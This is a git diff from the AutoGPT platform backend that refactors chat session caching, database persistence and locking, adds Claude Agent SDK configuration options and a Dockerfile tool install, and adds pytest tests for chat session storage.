fix(chat/sdk): validate proxy URL before blanking ANTHROPIC_API_KEY

Only set ANTHROPIC_API_KEY to the empty string ("") when both a valid base_url (one that starts with "http") and an api_key are configured. Otherwise, fall back to the SDK's default credentials so that direct Anthropic usage still works.
refactor(chat): rename sdk_ config prefix to claude_agent_ for clarity
2026-02-12 07:45:14 -05:00 · 2026-02-12 13:37:59 +04:00 · 2026-02-12 13:36:48 +04:00 · 2026-02-12 13:12:42 +04:00 · 2026-02-12 09:10:43 +04:00 · 2026-02-12 08:26:26 +04:00
258 changed files with 5522 additions and 3521 deletions
--- a/autogpt_platform/backend/Dockerfile
+++ b/autogpt_platform/backend/Dockerfile
@@ -62,12 +62,16 @@ ENV POETRY_HOME=/opt/poetry \
    DEBIAN_FRONTEND=noninteractive
 ENV PATH=/opt/poetry/bin:$PATH

-# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
+# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
+# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
 RUN apt-get update && apt-get install -y \
    python3.13 \
    python3-pip \
    ffmpeg \
    imagemagick \
+    jq \
+    ripgrep \
+    tree \
    && rm -rf /var/lib/apt/lists/*

 # Copy only necessary files from builder
--- a/autogpt_platform/backend/backend/api/external/v1/routes.py
+++ b/autogpt_platform/backend/backend/api/external/v1/routes.py
@@ -10,7 +10,7 @@ from typing_extensions import TypedDict

 import backend.api.features.store.cache as store_cache
 import backend.api.features.store.model as store_model
-import backend.blocks
+import backend.data.block
 from backend.api.external.middleware import require_permission
 from backend.data import execution as execution_db
 from backend.data import graph as graph_db
@@ -67,7 +67,7 @@ async def get_user_info(
    dependencies=[Security(require_permission(APIKeyPermission.READ_BLOCK))],
 )
 async def get_graph_blocks() -> Sequence[dict[Any, Any]]:
-    blocks = [block() for block in backend.blocks.get_blocks().values()]
+    blocks = [block() for block in backend.data.block.get_blocks().values()]
    return [b.to_dict() for b in blocks if not b.disabled]


@@ -83,7 +83,7 @@ async def execute_graph_block(
        require_permission(APIKeyPermission.EXECUTE_BLOCK)
    ),
 ) -> CompletedBlockOutput:
-    obj = backend.blocks.get_block(block_id)
+    obj = backend.data.block.get_block(block_id)
    if not obj:
        raise HTTPException(status_code=404, detail=f"Block #{block_id} not found.")
    if obj.disabled:
--- a/autogpt_platform/backend/backend/api/external/v1/tools.py
+++ b/autogpt_platform/backend/backend/api/external/v1/tools.py
@@ -15,9 +15,9 @@ from prisma.enums import APIKeyPermission
 from pydantic import BaseModel, Field

 from backend.api.external.middleware import require_permission
-from backend.copilot.model import ChatSession
-from backend.copilot.tools import find_agent_tool, run_agent_tool
-from backend.copilot.tools.models import ToolResponseBase
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools import find_agent_tool, run_agent_tool
+from backend.api.features.chat.tools.models import ToolResponseBase
 from backend.data.auth.base import APIAuthorizationInfo

 logger = logging.getLogger(__name__)
--- a/autogpt_platform/backend/backend/api/features/builder/db.py
+++ b/autogpt_platform/backend/backend/api/features/builder/db.py
@@ -10,15 +10,10 @@ import backend.api.features.library.db as library_db
 import backend.api.features.library.model as library_model
 import backend.api.features.store.db as store_db
 import backend.api.features.store.model as store_model
+import backend.data.block
 from backend.blocks import load_all_blocks
-from backend.blocks._base import (
-    AnyBlockSchema,
-    BlockCategory,
-    BlockInfo,
-    BlockSchema,
-    BlockType,
-)
 from backend.blocks.llm import LlmModel
+from backend.data.block import AnyBlockSchema, BlockCategory, BlockInfo, BlockSchema
 from backend.data.db import query_raw_with_schema
 from backend.integrations.providers import ProviderName
 from backend.util.cache import cached
@@ -27,7 +22,7 @@ from backend.util.models import Pagination
 from .model import (
    BlockCategoryResponse,
    BlockResponse,
-    BlockTypeFilter,
+    BlockType,
    CountResponse,
    FilterType,
    Provider,
@@ -93,7 +88,7 @@ def get_block_categories(category_blocks: int = 3) -> list[BlockCategoryResponse
 def get_blocks(
    *,
    category: str | None = None,
-    type: BlockTypeFilter | None = None,
+    type: BlockType | None = None,
    provider: ProviderName | None = None,
    page: int = 1,
    page_size: int = 50,
@@ -674,9 +669,9 @@ async def get_suggested_blocks(count: int = 5) -> list[BlockInfo]:
    for block_type in load_all_blocks().values():
        block: AnyBlockSchema = block_type()
        if block.disabled or block.block_type in (
-            BlockType.INPUT,
-            BlockType.OUTPUT,
-            BlockType.AGENT,
+            backend.data.block.BlockType.INPUT,
+            backend.data.block.BlockType.OUTPUT,
+            backend.data.block.BlockType.AGENT,
        ):
            continue
        # Find the execution count for this block
--- a/autogpt_platform/backend/backend/api/features/builder/model.py
+++ b/autogpt_platform/backend/backend/api/features/builder/model.py
@@ -4,7 +4,7 @@ from pydantic import BaseModel

 import backend.api.features.library.model as library_model
 import backend.api.features.store.model as store_model
-from backend.blocks._base import BlockInfo
+from backend.data.block import BlockInfo
 from backend.integrations.providers import ProviderName
 from backend.util.models import Pagination

@@ -15,7 +15,7 @@ FilterType = Literal[
    "my_agents",
 ]

-BlockTypeFilter = Literal["all", "input", "action", "output"]
+BlockType = Literal["all", "input", "action", "output"]


 class SearchEntry(BaseModel):
--- a/autogpt_platform/backend/backend/api/features/builder/routes.py
+++ b/autogpt_platform/backend/backend/api/features/builder/routes.py
@@ -88,7 +88,7 @@ async def get_block_categories(
 )
 async def get_blocks(
    category: Annotated[str | None, fastapi.Query()] = None,
-    type: Annotated[builder_model.BlockTypeFilter | None, fastapi.Query()] = None,
+    type: Annotated[builder_model.BlockType | None, fastapi.Query()] = None,
    provider: Annotated[ProviderName | None, fastapi.Query()] = None,
    page: Annotated[int, fastapi.Query()] = 1,
    page_size: Annotated[int, fastapi.Query()] = 50,
--- a/autogpt_platform/backend/backend/api/features/chat/completion_consumer.py
+++ b/autogpt_platform/backend/backend/api/features/chat/completion_consumer.py
@@ -119,9 +119,8 @@ class ChatCompletionConsumer:
        """Lazily initialize Prisma client on first use."""
        if self._prisma is None:
            database_url = os.getenv("DATABASE_URL", "postgresql://localhost:5432")
-            prisma = Prisma(datasource={"url": database_url})
-            await prisma.connect()
-            self._prisma = prisma
+            self._prisma = Prisma(datasource={"url": database_url})
+            await self._prisma.connect()
            logger.info("[COMPLETION] Consumer Prisma client connected (lazy init)")
        return self._prisma

--- a/autogpt_platform/backend/backend/api/features/chat/completion_handler.py
+++ b/autogpt_platform/backend/backend/api/features/chat/completion_handler.py
--- a/autogpt_platform/backend/backend/api/features/chat/config.py
+++ b/autogpt_platform/backend/backend/api/features/chat/config.py
@@ -27,12 +27,11 @@ class ChatConfig(BaseSettings):
    session_ttl: int = Field(default=43200, description="Session TTL in seconds")

    # Streaming Configuration
-    max_context_messages: int = Field(
-        default=50, ge=1, le=200, description="Maximum context messages"
-    )
-
    stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
-    max_retries: int = Field(default=3, description="Maximum number of retries")
+    max_retries: int = Field(
+        default=3,
+        description="Max retries for fallback path (SDK handles retries internally)",
+    )
    max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
    max_agent_schedules: int = Field(
        default=30, description="Maximum number of agent schedules"
@@ -93,6 +92,27 @@ class ChatConfig(BaseSettings):
        description="Name of the prompt in Langfuse to fetch",
    )

+    # Claude Agent SDK Configuration
+    use_claude_agent_sdk: bool = Field(
+        default=True,
+        description="Use Claude Agent SDK for chat completions",
+    )
+    claude_agent_model: str | None = Field(
+        default=None,
+        description="Model for the Claude Agent SDK path. If None, derives from "
+        "the `model` field by stripping the OpenRouter provider prefix.",
+    )
+    claude_agent_max_budget_usd: float | None = Field(
+        default=None,
+        gt=0,
+        description="Max budget in USD per Claude Agent SDK session (None = unlimited)",
+    )
+    claude_agent_max_buffer_size: int = Field(
+        default=10 * 1024 * 1024,  # 10MB (default SDK is 1MB)
+        description="Max buffer size in bytes for Claude Agent SDK JSON message parsing. "
+        "Increase if tool outputs exceed the limit.",
+    )
+
    # Extended thinking configuration for Claude models
    thinking_enabled: bool = Field(
        default=True,
@@ -138,6 +158,17 @@ class ChatConfig(BaseSettings):
            v = os.getenv("CHAT_INTERNAL_API_KEY")
        return v

+    @field_validator("use_claude_agent_sdk", mode="before")
+    @classmethod
+    def get_use_claude_agent_sdk(cls, v):
+        """Resolve use_claude_agent_sdk; a set env var overrides the given value."""
+        # Check environment variable - default to True if not set
+        env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
+        if env_val:
+            return env_val in ("true", "1", "yes", "on")
+        # No env override: keep the provided value, defaulting to True when it is None
+        return True if v is None else v
+
    # Prompt paths for different contexts
    PROMPT_PATHS: dict[str, str] = {
        "default": "prompts/chat_system.md",
--- a/autogpt_platform/backend/backend/api/features/chat/db.py
+++ b/autogpt_platform/backend/backend/api/features/chat/db.py
@@ -14,7 +14,7 @@ from prisma.types import (
    ChatSessionWhereInput,
 )

-from backend.data import db
+from backend.data.db import transaction
 from backend.util.json import SafeJson

 logger = logging.getLogger(__name__)
@@ -147,7 +147,7 @@ async def add_chat_messages_batch(

    created_messages = []

-    async with db.transaction() as tx:
+    async with transaction() as tx:
        for i, msg in enumerate(messages):
            # Build input dict dynamically rather than using ChatMessageCreateInput
            # directly because Prisma's TypedDict validation rejects optional fields
--- a/autogpt_platform/backend/backend/api/features/chat/model.py
+++ b/autogpt_platform/backend/backend/api/features/chat/model.py
@@ -2,7 +2,7 @@ import asyncio
 import logging
 import uuid
 from datetime import UTC, datetime
-from typing import Any, cast
+from typing import Any
 from weakref import WeakValueDictionary

 from openai.types.chat import (
@@ -23,17 +23,26 @@ from prisma.models import ChatMessage as PrismaChatMessage
 from prisma.models import ChatSession as PrismaChatSession
 from pydantic import BaseModel

-from backend.data.db_accessors import chat_db
 from backend.data.redis_client import get_redis_async
 from backend.util import json
 from backend.util.exceptions import DatabaseError, RedisError

+from . import db as chat_db
 from .config import ChatConfig

 logger = logging.getLogger(__name__)
 config = ChatConfig()


+def _parse_json_field(value: str | dict | list | None, default: Any = None) -> Any:
+    """Parse a JSON field that may be stored as string or already parsed."""
+    if value is None:
+        return default
+    if isinstance(value, str):
+        return json.loads(value)
+    return value
+
+
 # Redis cache key prefix for chat sessions
 CHAT_SESSION_CACHE_PREFIX = "chat:session:"

@@ -43,7 +52,28 @@ def _get_session_cache_key(session_id: str) -> str:
    return f"{CHAT_SESSION_CACHE_PREFIX}{session_id}"


-# ===================== Chat data models ===================== #
+# Session-level locks to prevent race conditions during concurrent upserts.
+# Uses WeakValueDictionary to automatically garbage collect locks when no longer referenced,
+# preventing unbounded memory growth while maintaining lock semantics for active sessions.
+# Invalidation: Locks are auto-removed by GC when no coroutine holds a reference (after
+# async with lock: completes). Explicit cleanup also occurs in delete_chat_session().
+_session_locks: WeakValueDictionary[str, asyncio.Lock] = WeakValueDictionary()
+_session_locks_mutex = asyncio.Lock()
+
+
+async def _get_session_lock(session_id: str) -> asyncio.Lock:
+    """Get or create a lock for a specific session to prevent concurrent upserts.
+
+    Uses WeakValueDictionary for automatic cleanup: locks are garbage collected
+    when no coroutine holds a reference to them, preventing memory leaks from
+    unbounded growth of session locks.
+    """
+    async with _session_locks_mutex:
+        lock = _session_locks.get(session_id)
+        if lock is None:
+            lock = asyncio.Lock()
+            _session_locks[session_id] = lock
+        return lock


 class ChatMessage(BaseModel):
@@ -74,26 +104,6 @@ class ChatSession(BaseModel):
    successful_agent_runs: dict[str, int] = {}
    successful_agent_schedules: dict[str, int] = {}

-    def add_tool_call_to_current_turn(self, tool_call: dict) -> None:
-        """Attach a tool_call to the current turn's assistant message.
-
-        Searches backwards for the most recent assistant message (stopping at
-        any user message boundary). If found, appends the tool_call to it.
-        Otherwise creates a new assistant message with the tool_call.
-        """
-        for msg in reversed(self.messages):
-            if msg.role == "user":
-                break
-            if msg.role == "assistant":
-                if not msg.tool_calls:
-                    msg.tool_calls = []
-                msg.tool_calls.append(tool_call)
-                return
-
-        self.messages.append(
-            ChatMessage(role="assistant", content="", tool_calls=[tool_call])
-        )
-
    @staticmethod
    def new(user_id: str) -> "ChatSession":
        return ChatSession(
@@ -162,47 +172,6 @@ class ChatSession(BaseModel):
            successful_agent_schedules=successful_agent_schedules,
        )

-    @staticmethod
-    def _merge_consecutive_assistant_messages(
-        messages: list[ChatCompletionMessageParam],
-    ) -> list[ChatCompletionMessageParam]:
-        """Merge consecutive assistant messages into single messages.
-
-        Long-running tool flows can create split assistant messages: one with
-        text content and another with tool_calls. Anthropic's API requires
-        tool_result blocks to reference a tool_use in the immediately preceding
-        assistant message, so these splits cause 400 errors via OpenRouter.
-        """
-        if len(messages) < 2:
-            return messages
-
-        result: list[ChatCompletionMessageParam] = [messages[0]]
-        for msg in messages[1:]:
-            prev = result[-1]
-            if prev.get("role") != "assistant" or msg.get("role") != "assistant":
-                result.append(msg)
-                continue
-
-            prev = cast(ChatCompletionAssistantMessageParam, prev)
-            curr = cast(ChatCompletionAssistantMessageParam, msg)
-
-            curr_content = curr.get("content") or ""
-            if curr_content:
-                prev_content = prev.get("content") or ""
-                prev["content"] = (
-                    f"{prev_content}\n{curr_content}" if prev_content else curr_content
-                )
-
-            curr_tool_calls = curr.get("tool_calls")
-            if curr_tool_calls:
-                prev_tool_calls = prev.get("tool_calls")
-                prev["tool_calls"] = (
-                    list(prev_tool_calls) + list(curr_tool_calls)
-                    if prev_tool_calls
-                    else list(curr_tool_calls)
-                )
-        return result
-
    def to_openai_messages(self) -> list[ChatCompletionMessageParam]:
        messages = []
        for message in self.messages:
@@ -289,31 +258,42 @@ class ChatSession(BaseModel):
                        name=message.name or "",
                    )
                )
-        return self._merge_consecutive_assistant_messages(messages)
+        return messages


-def _parse_json_field(value: str | dict | list | None, default: Any = None) -> Any:
-    """Parse a JSON field that may be stored as string or already parsed."""
-    if value is None:
-        return default
-    if isinstance(value, str):
-        return json.loads(value)
-    return value
+async def _get_session_from_cache(session_id: str) -> ChatSession | None:
+    """Get a chat session from Redis cache."""
+    redis_key = _get_session_cache_key(session_id)
+    async_redis = await get_redis_async()
+    raw_session: bytes | None = await async_redis.get(redis_key)
+
+    if raw_session is None:
+        return None
+
+    try:
+        session = ChatSession.model_validate_json(raw_session)
+        logger.info(
+            f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
+            f"last_roles={[m.role for m in session.messages[-3:]]}"  # Last 3 roles
+        )
+        return session
+    except Exception as e:
+        logger.error(f"Failed to deserialize session {session_id}: {e}", exc_info=True)
+        raise RedisError(f"Corrupted session data for {session_id}") from e


-# ================ Chat cache + DB operations ================ #
-
-# NOTE: Database calls are automatically routed through DatabaseManager if Prisma is not
-#       connected directly.
-
-
-async def cache_chat_session(session: ChatSession) -> None:
-    """Cache a chat session in Redis (without persisting to the database)."""
+async def _cache_session(session: ChatSession) -> None:
+    """Cache a chat session in Redis."""
    redis_key = _get_session_cache_key(session.session_id)
    async_redis = await get_redis_async()
    await async_redis.setex(redis_key, config.session_ttl, session.model_dump_json())


+async def cache_chat_session(session: ChatSession) -> None:
+    """Cache a chat session without persisting to the database."""
+    await _cache_session(session)
+
+
 async def invalidate_session_cache(session_id: str) -> None:
    """Invalidate a chat session from Redis cache.

@@ -329,6 +309,77 @@ async def invalidate_session_cache(session_id: str) -> None:
        logger.warning(f"Failed to invalidate session cache for {session_id}: {e}")


+async def _get_session_from_db(session_id: str) -> ChatSession | None:
+    """Get a chat session from the database."""
+    prisma_session = await chat_db.get_chat_session(session_id)
+    if not prisma_session:
+        return None
+
+    messages = prisma_session.Messages
+    logger.debug(
+        f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
+        f"roles={[m.role for m in messages[-3:]] if messages else []}"  # Last 3 roles
+    )
+
+    return ChatSession.from_db(prisma_session, messages)
+
+
+async def _save_session_to_db(
+    session: ChatSession, existing_message_count: int
+) -> None:
+    """Save or update a chat session in the database."""
+    # Check if session exists in DB
+    existing = await chat_db.get_chat_session(session.session_id)
+
+    if not existing:
+        # Create new session
+        await chat_db.create_chat_session(
+            session_id=session.session_id,
+            user_id=session.user_id,
+        )
+        existing_message_count = 0
+
+    # Calculate total tokens from usage
+    total_prompt = sum(u.prompt_tokens for u in session.usage)
+    total_completion = sum(u.completion_tokens for u in session.usage)
+
+    # Update session metadata
+    await chat_db.update_chat_session(
+        session_id=session.session_id,
+        credentials=session.credentials,
+        successful_agent_runs=session.successful_agent_runs,
+        successful_agent_schedules=session.successful_agent_schedules,
+        total_prompt_tokens=total_prompt,
+        total_completion_tokens=total_completion,
+    )
+
+    # Add new messages (only those after existing count)
+    new_messages = session.messages[existing_message_count:]
+    if new_messages:
+        messages_data = []
+        for msg in new_messages:
+            messages_data.append(
+                {
+                    "role": msg.role,
+                    "content": msg.content,
+                    "name": msg.name,
+                    "tool_call_id": msg.tool_call_id,
+                    "refusal": msg.refusal,
+                    "tool_calls": msg.tool_calls,
+                    "function_call": msg.function_call,
+                }
+            )
+        logger.debug(
+            f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
+            f"roles={[m['role'] for m in messages_data]}"
+        )
+        await chat_db.add_chat_messages_batch(
+            session_id=session.session_id,
+            messages=messages_data,
+            start_sequence=existing_message_count,
+        )
+
+
 async def get_chat_session(
    session_id: str,
    user_id: str | None = None,
@@ -360,7 +411,7 @@ async def get_chat_session(
        logger.warning(f"Unexpected cache error for session {session_id}: {e}")

    # Fall back to database
-    logger.info(f"Session {session_id} not in cache, checking database")
+    logger.debug(f"Session {session_id} not in cache, checking database")
    session = await _get_session_from_db(session_id)

    if session is None:
@@ -376,53 +427,13 @@ async def get_chat_session(

    # Cache the session from DB
    try:
-        await cache_chat_session(session)
-        logger.info(f"Cached session {session_id} from database")
+        await _cache_session(session)
    except Exception as e:
        logger.warning(f"Failed to cache session {session_id}: {e}")

    return session


-async def _get_session_from_cache(session_id: str) -> ChatSession | None:
-    """Get a chat session from Redis cache."""
-    redis_key = _get_session_cache_key(session_id)
-    async_redis = await get_redis_async()
-    raw_session: bytes | None = await async_redis.get(redis_key)
-
-    if raw_session is None:
-        return None
-
-    try:
-        session = ChatSession.model_validate_json(raw_session)
-        logger.info(
-            f"Loading session {session_id} from cache: "
-            f"message_count={len(session.messages)}, "
-            f"roles={[m.role for m in session.messages]}"
-        )
-        return session
-    except Exception as e:
-        logger.error(f"Failed to deserialize session {session_id}: {e}", exc_info=True)
-        raise RedisError(f"Corrupted session data for {session_id}") from e
-
-
-async def _get_session_from_db(session_id: str) -> ChatSession | None:
-    """Get a chat session from the database."""
-    prisma_session = await chat_db().get_chat_session(session_id)
-    if not prisma_session:
-        return None
-
-    messages = prisma_session.Messages
-    logger.info(
-        f"Loading session {session_id} from DB: "
-        f"has_messages={messages is not None}, "
-        f"message_count={len(messages) if messages else 0}, "
-        f"roles={[m.role for m in messages] if messages else []}"
-    )
-
-    return ChatSession.from_db(prisma_session, messages)
-
-
 async def upsert_chat_session(
    session: ChatSession,
 ) -> ChatSession:
@@ -443,7 +454,7 @@ async def upsert_chat_session(

    async with lock:
        # Get existing message count from DB for incremental saves
-        existing_message_count = await chat_db().get_chat_session_message_count(
+        existing_message_count = await chat_db.get_chat_session_message_count(
            session.session_id
        )

@@ -460,7 +471,7 @@ async def upsert_chat_session(

        # Save to cache (best-effort, even if DB failed)
        try:
-            await cache_chat_session(session)
+            await _cache_session(session)
        except Exception as e:
            # If DB succeeded but cache failed, raise cache error
            if db_error is None:
@@ -481,63 +492,38 @@ async def upsert_chat_session(
        return session


-async def _save_session_to_db(
-    session: ChatSession, existing_message_count: int
-) -> None:
-    """Save or update a chat session in the database."""
-    db = chat_db()
+async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
+    """Atomically append a message to a session and persist it.

-    # Check if session exists in DB
-    existing = await db.get_chat_session(session.session_id)
+    Acquires the session lock, re-fetches the latest session state,
+    appends the message, and saves — preventing message loss when
+    concurrent requests modify the same session.
+    """
+    lock = await _get_session_lock(session_id)

-    if not existing:
-        # Create new session
-        await db.create_chat_session(
-            session_id=session.session_id,
-            user_id=session.user_id,
+    async with lock:
+        session = await get_chat_session(session_id)
+        if session is None:
+            raise ValueError(f"Session {session_id} not found")
+
+        session.messages.append(message)
+        existing_message_count = await chat_db.get_chat_session_message_count(
+            session_id
        )
-        existing_message_count = 0

-    # Calculate total tokens from usage
-    total_prompt = sum(u.prompt_tokens for u in session.usage)
-    total_completion = sum(u.completion_tokens for u in session.usage)
+        try:
+            await _save_session_to_db(session, existing_message_count)
+        except Exception as e:
+            raise DatabaseError(
+                f"Failed to persist message to session {session_id}"
+            ) from e

-    # Update session metadata
-    await db.update_chat_session(
-        session_id=session.session_id,
-        credentials=session.credentials,
-        successful_agent_runs=session.successful_agent_runs,
-        successful_agent_schedules=session.successful_agent_schedules,
-        total_prompt_tokens=total_prompt,
-        total_completion_tokens=total_completion,
-    )
+        try:
+            await _cache_session(session)
+        except Exception as e:
+            logger.warning(f"Cache write failed for session {session_id}: {e}")

-    # Add new messages (only those after existing count)
-    new_messages = session.messages[existing_message_count:]
-    if new_messages:
-        messages_data = []
-        for msg in new_messages:
-            messages_data.append(
-                {
-                    "role": msg.role,
-                    "content": msg.content,
-                    "name": msg.name,
-                    "tool_call_id": msg.tool_call_id,
-                    "refusal": msg.refusal,
-                    "tool_calls": msg.tool_calls,
-                    "function_call": msg.function_call,
-                }
-            )
-        logger.info(
-            f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
-            f"roles={[m['role'] for m in messages_data]}, "
-            f"start_sequence={existing_message_count}"
-        )
-        await db.add_chat_messages_batch(
-            session_id=session.session_id,
-            messages=messages_data,
-            start_sequence=existing_message_count,
-        )
+        return session


 async def create_chat_session(user_id: str) -> ChatSession:
@@ -552,7 +538,7 @@ async def create_chat_session(user_id: str) -> ChatSession:

    # Create in database first - fail fast if this fails
    try:
-        await chat_db().create_chat_session(
+        await chat_db.create_chat_session(
            session_id=session.session_id,
            user_id=user_id,
        )
@@ -564,7 +550,7 @@ async def create_chat_session(user_id: str) -> ChatSession:

    # Cache the session (best-effort optimization, DB is source of truth)
    try:
-        await cache_chat_session(session)
+        await _cache_session(session)
    except Exception as e:
        logger.warning(f"Failed to cache new session {session.session_id}: {e}")

@@ -582,9 +568,8 @@ async def get_user_sessions(
        A tuple of (sessions, total_count) where total_count is the overall
        number of sessions for the user (not just the current page).
    """
-    db = chat_db()
-    prisma_sessions = await db.get_user_chat_sessions(user_id, limit, offset)
-    total_count = await db.get_user_session_count(user_id)
+    prisma_sessions = await chat_db.get_user_chat_sessions(user_id, limit, offset)
+    total_count = await chat_db.get_user_session_count(user_id)

    sessions = []
    for prisma_session in prisma_sessions:
@@ -607,7 +592,7 @@ async def delete_chat_session(session_id: str, user_id: str | None = None) -> bo
    """
    # Delete from database first (with optional user_id validation)
    # This confirms ownership before invalidating cache
-    deleted = await chat_db().delete_chat_session(session_id, user_id)
+    deleted = await chat_db.delete_chat_session(session_id, user_id)

    if not deleted:
        return False
@@ -642,46 +627,26 @@ async def update_session_title(session_id: str, title: str) -> bool:
        True if updated successfully, False otherwise.
    """
    try:
-        result = await chat_db().update_chat_session(session_id=session_id, title=title)
+        result = await chat_db.update_chat_session(session_id=session_id, title=title)
        if result is None:
            logger.warning(f"Session {session_id} not found for title update")
            return False

-        # Invalidate cache so next fetch gets updated title
+        # Update title in cache if it exists (instead of invalidating).
+        # This prevents race conditions where cache invalidation causes
+        # the frontend to see stale DB data while streaming is still in progress.
        try:
-            redis_key = _get_session_cache_key(session_id)
-            async_redis = await get_redis_async()
-            await async_redis.delete(redis_key)
+            cached = await _get_session_from_cache(session_id)
+            if cached:
+                cached.title = title
+                await _cache_session(cached)
        except Exception as e:
-            logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
+            # Not critical - title will be correct on next full cache refresh
+            logger.warning(
+                f"Failed to update title in cache for session {session_id}: {e}"
+            )

        return True
    except Exception as e:
        logger.error(f"Failed to update title for session {session_id}: {e}")
        return False
-
-
-# ==================== Chat session locks ==================== #
-
-_session_locks: WeakValueDictionary[str, asyncio.Lock] = WeakValueDictionary()
-_session_locks_mutex = asyncio.Lock()
-
-
-async def _get_session_lock(session_id: str) -> asyncio.Lock:
-    """Get or create a lock for a specific session to prevent concurrent upserts.
-
-    This was originally added to solve the specific problem of race conditions between
-    the session title thread and the conversation thread, which always occurs on the
-    same instance as we prevent rapid request sends on the frontend.
-
-    Uses WeakValueDictionary for automatic cleanup: locks are garbage collected
-    when no coroutine holds a reference to them, preventing memory leaks from
-    unbounded growth of session locks. Explicit cleanup also occurs
-    in `delete_chat_session()`.
-    """
-    async with _session_locks_mutex:
-        lock = _session_locks.get(session_id)
-        if lock is None:
-            lock = asyncio.Lock()
-            _session_locks[session_id] = lock
-        return lock
--- a/autogpt_platform/backend/backend/api/features/chat/model_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/model_test.py
@@ -0,0 +1,119 @@
+import pytest
+
+from .model import (
+    ChatMessage,
+    ChatSession,
+    Usage,
+    get_chat_session,
+    upsert_chat_session,
+)
+
+messages = [
+    ChatMessage(content="Hello, how are you?", role="user"),
+    ChatMessage(
+        content="I'm fine, thank you!",
+        role="assistant",
+        tool_calls=[
+            {
+                "id": "t123",
+                "type": "function",
+                "function": {
+                    "name": "get_weather",
+                    "arguments": '{"city": "New York"}',
+                },
+            }
+        ],
+    ),
+    ChatMessage(
+        content="I'm using the tool to get the weather",
+        role="tool",
+        tool_call_id="t123",
+    ),
+]
+
+
+@pytest.mark.asyncio(loop_scope="session")
+async def test_chatsession_serialization_deserialization():
+    """A session must survive a JSON dump/validate round trip unchanged."""
+    session = ChatSession.new(user_id="abc123")
+    session.messages = messages
+    session.usage = [Usage(prompt_tokens=100, completion_tokens=200, total_tokens=300)]
+    restored = ChatSession.model_validate_json(session.model_dump_json())
+    assert restored.model_dump() == session.model_dump()
+
+
+@pytest.mark.asyncio(loop_scope="session")
+async def test_chatsession_redis_storage(setup_test_user, test_user_id):
+    """A session read back for the same user must equal what upsert returned."""
+    s = ChatSession.new(user_id=test_user_id)
+    s.messages = messages
+
+    s = await upsert_chat_session(s)
+
+    s2 = await get_chat_session(
+        session_id=s.session_id,
+        user_id=s.user_id,
+    )
+
+    assert s2 == s
+
+
+@pytest.mark.asyncio(loop_scope="session")
+async def test_chatsession_redis_storage_user_id_mismatch(
+    setup_test_user, test_user_id
+):
+    """Fetching a stored session with a different user id must return None."""
+    s = ChatSession.new(user_id=test_user_id)
+    s.messages = messages
+    s = await upsert_chat_session(s)
+
+    s2 = await get_chat_session(s.session_id, "different_user_id")
+
+    assert s2 is None
+
+
+@pytest.mark.asyncio(loop_scope="session")
+async def test_chatsession_db_storage(setup_test_user, test_user_id):
+    """Messages survive a DB round trip once the Redis cache entry is deleted."""
+    from backend.data.redis_client import get_redis_async
+
+    # Create session with messages including assistant message
+    s = ChatSession.new(user_id=test_user_id)
+    s.messages = messages  # Contains user, assistant, and tool messages
+    assert s.session_id is not None, "Session id is not set"
+    # Upsert to save to both cache and DB
+    s = await upsert_chat_session(s)
+
+    # Clear the Redis cache to force DB load
+    redis_key = f"chat:session:{s.session_id}"
+    async_redis = await get_redis_async()
+    await async_redis.delete(redis_key)
+
+    # Load from DB (cache was cleared)
+    s2 = await get_chat_session(
+        session_id=s.session_id,
+        user_id=s.user_id,
+    )
+
+    assert s2 is not None, "Session not found after loading from DB"
+    assert len(s2.messages) == len(
+        s.messages
+    ), f"Message count mismatch: expected {len(s.messages)}, got {len(s2.messages)}"
+
+    # Verify all roles are present
+    roles = [m.role for m in s2.messages]
+    assert "user" in roles, f"User message missing. Roles found: {roles}"
+    assert "assistant" in roles, f"Assistant message missing. Roles found: {roles}"
+    assert "tool" in roles, f"Tool message missing. Roles found: {roles}"
+
+    # Verify role, content and tool-call count of each message pair
+    for orig, loaded in zip(s.messages, s2.messages):
+        assert orig.role == loaded.role, f"Role mismatch: {orig.role} != {loaded.role}"
+        assert (
+            orig.content == loaded.content
+        ), f"Content mismatch for {orig.role}: {orig.content} != {loaded.content}"
+        if orig.tool_calls:
+            assert (
+                loaded.tool_calls is not None
+            ), f"Tool calls missing for {orig.role} message"
+            assert len(orig.tool_calls) == len(loaded.tool_calls)
--- a/autogpt_platform/backend/backend/api/features/chat/response_model.py
+++ b/autogpt_platform/backend/backend/api/features/chat/response_model.py
--- a/autogpt_platform/backend/backend/api/features/chat/routes.py
+++ b/autogpt_platform/backend/backend/api/features/chat/routes.py
@@ -1,5 +1,6 @@
 """Chat API routes for chat session management and streaming via SSE."""

+import asyncio
 import logging
 import uuid as uuid_module
 from collections.abc import AsyncGenerator
@@ -10,22 +11,23 @@ from fastapi import APIRouter, Depends, Header, HTTPException, Query, Response,
 from fastapi.responses import StreamingResponse
 from pydantic import BaseModel

-from backend.copilot import service as chat_service
-from backend.copilot import stream_registry
-from backend.copilot.completion_handler import (
-    process_operation_failure,
-    process_operation_success,
-)
-from backend.copilot.config import ChatConfig
-from backend.copilot.executor.utils import enqueue_copilot_task
-from backend.copilot.model import (
+from backend.util.exceptions import NotFoundError
+
+from . import service as chat_service
+from . import stream_registry
+from .completion_handler import process_operation_failure, process_operation_success
+from .config import ChatConfig
+from .model import (
+    ChatMessage,
    ChatSession,
+    append_and_save_message,
    create_chat_session,
    get_chat_session,
    get_user_sessions,
 )
-from backend.copilot.response_model import StreamFinish, StreamHeartbeat
-from backend.copilot.tools.models import (
+from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
+from .sdk import service as sdk_service
+from .tools.models import (
    AgentDetailsResponse,
    AgentOutputResponse,
    AgentPreviewResponse,
@@ -47,7 +49,7 @@ from backend.copilot.tools.models import (
    SetupRequirementsResponse,
    UnderstandingUpdatedResponse,
 )
-from backend.util.exceptions import NotFoundError
+from .tracking import track_user_message

 config = ChatConfig()

